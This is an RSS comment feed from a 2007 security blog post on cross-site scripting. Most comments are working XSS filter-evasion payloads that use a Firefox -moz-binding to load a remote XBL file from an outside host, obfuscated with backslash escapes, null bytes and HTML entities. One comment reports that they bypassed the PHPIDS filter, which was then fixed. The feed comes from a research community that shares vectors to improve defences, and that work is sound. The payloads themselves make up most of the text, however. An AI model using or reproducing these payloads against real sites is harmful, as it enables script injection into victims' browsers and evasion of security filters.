Comments on: Awesome XSS http://www.thespanner.co.uk/2007/11/24/awesome-xss/ A tool for designers dealing with programmers dealing with designers... Tue, 14 Oct 2008 01:54:07 +0000 http://wordpress.org/?v=2.6.2 By: Gareth Heyes http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-922 Gareth Heyes Mon, 26 Nov 2007 12:42:44 +0000 http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-922 I've added this functionality to Hackvertor as a tag (backslashesc) under filter evasion:- <div/style=<@backslashesc>-moz-binding<@/backslashesc>:<@backslashesc>url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)<@/backslashesc>> Much easier than having to remember which characters can be escaped ;) I’ve added this functionality to Hackvertor as a tag (backslashesc) under filter evasion:-

<div/style=<@backslashesc>-moz-binding<@/backslashesc>:<@backslashesc>url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)<@/backslashesc>>

Much easier than having to remember which characters can be escaped ;)

]]> By: .mario http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-915 .mario Mon, 26 Nov 2007 08:36:38 +0000 http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-915 Eew... that's indeed incredible! We need that ones for the xssDB! Eew… that’s indeed incredible! We need that ones for the xssDB!

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-914 Gareth Heyes Mon, 26 Nov 2007 01:48:04 +0000 http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-914 <x/style=-\m\000000o\000000z\000000-b\000000i\000000nd\000000i\000000n\000000g\000000:\000000u\000000r\000000l\000000(\000000/\000000/b\000000u\000000s\000000i\000000ne\000000s\000000s\000000i\000000nf\000000o\000000.c\000000o\000000.\000000u\000000k\000000/\000000la\000000b\000000s\000000/\000000x\000000b\000000l\000000/\000000x\000000b\000000l\000000.\000000x\000000m\000000l\000000#\000000x\000000s\000000s\000000)> <x/style=-\m\000000o\000000z\000000-b\000000i\000000nd\000000i\000000n\000000g\000000:\000000u\000000r\000000l\000000(\000000/\000000/b\000000u\000000s\000000i\000000ne\000000s\000000s\000000i\000000nf\000000o\000000.c\000000o\000000.\000000u\000000k\000000/\000000la\000000b\000000s\000000/\000000x\000000b\000000l\000000/\000000x\000000b\000000l\000000.\000000x\000000m\000000l\000000#\000000x\000000s\000000s\000000)>

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-913 Gareth Heyes Mon, 26 Nov 2007 01:32:25 +0000 http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-913 Believe it or not this is also a working mozbinding lol :- <x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)> Believe it or not this is also a working mozbinding lol :-
<x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-912 Gareth Heyes Mon, 26 Nov 2007 01:12:18 +0000 http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-912 Hehe a hacker always attacks at the most inconvenient time ;) Hehe a hacker always attacks at the most inconvenient time ;)

]]> By: .mario http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-910 .mario Sun, 25 Nov 2007 22:01:00 +0000 http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-910 Gareth you bandit ;) Hacking the PHPIDS while i visit my grams place *g* Well done and of course fixed by now! Thanks and Greetings, .mario Gareth you bandit ;) Hacking the PHPIDS while i visit my grams place *g*

Well done and of course fixed by now!

Thanks and Greetings,
.mario

]]> By: Information security http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-909 Information security Sun, 25 Nov 2007 11:10:21 +0000 http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-909 A tool to automate your XSS hacking/testing attempts based on the ha.ckers.org xss attacks xml. If its getting easier to test for XSS vulnerabilities, then its getting easier to exploit those vulnerabilities. A tool to automate your XSS hacking/testing attempts based on the ha.ckers.org xss attacks xml. If its getting easier to test for XSS vulnerabilities, then its getting easier to exploit those vulnerabilities.

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-908 Gareth Heyes Sun, 25 Nov 2007 01:37:19 +0000 http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-908 <div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> <Q%^&*(£@!'" style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> <div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

<Q%^&*(£@!’” style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-907 Gareth Heyes Sun, 25 Nov 2007 01:17:31 +0000 http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-907 Check these out too :) <div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45& #98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:& #92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105& #110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46& #99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115 &#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92 &#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&> <div style=&#x2D&#x6D&#x6F&#x7A&#x2D&#x62&#x69&#x6E&#x64& #x69&#x6E&#x67:&#x75&#x72&#x6C&#x28&#x2F&#x2F&#x62&#x75& #x73&#x69&#x6E&#x65&#x73&#x73&#x69&#x6E&#x66&#x6F&#x2E& #x63&#x6F&#x2E&#x75&#x6B&#x2F&#x6C&#x61&#x62&#x73&#x2F& #x78&#x62&#x6C&#x2F&#x78&#x62&#x6C&#x2E&#x78&#x6D&#x6C &#x23&#x78&#x73&#x73&#x29> Check these out too :)

<div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&
#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&
#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&
#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&
#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115
&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92
&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>

<div style=&#x2D&#x6D&#x6F&#x7A&#x2D&#x62&#x69&#x6E&#x64&
#x69&#x6E&#x67:&#x75&#x72&#x6C&#x28&#x2F&#x2F&#x62&#x75&
#x73&#x69&#x6E&#x65&#x73&#x73&#x69&#x6E&#x66&#x6F&#x2E&
#x63&#x6F&#x2E&#x75&#x6B&#x2F&#x6C&#x61&#x62&#x73&#x2F&
#x78&#x62&#x6C&#x2F&#x78&#x62&#x6C&#x2E&#x78&#x6D&#x6C
&#x23&#x78&#x73&#x73&#x29>

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-906 Gareth Heyes Sun, 25 Nov 2007 01:07:58 +0000 http://www.thespanner.co.uk/2007/11/24/awesome-xss/#comment-906 hehe thanks, you next? :) hehe thanks, you next? :)

]]>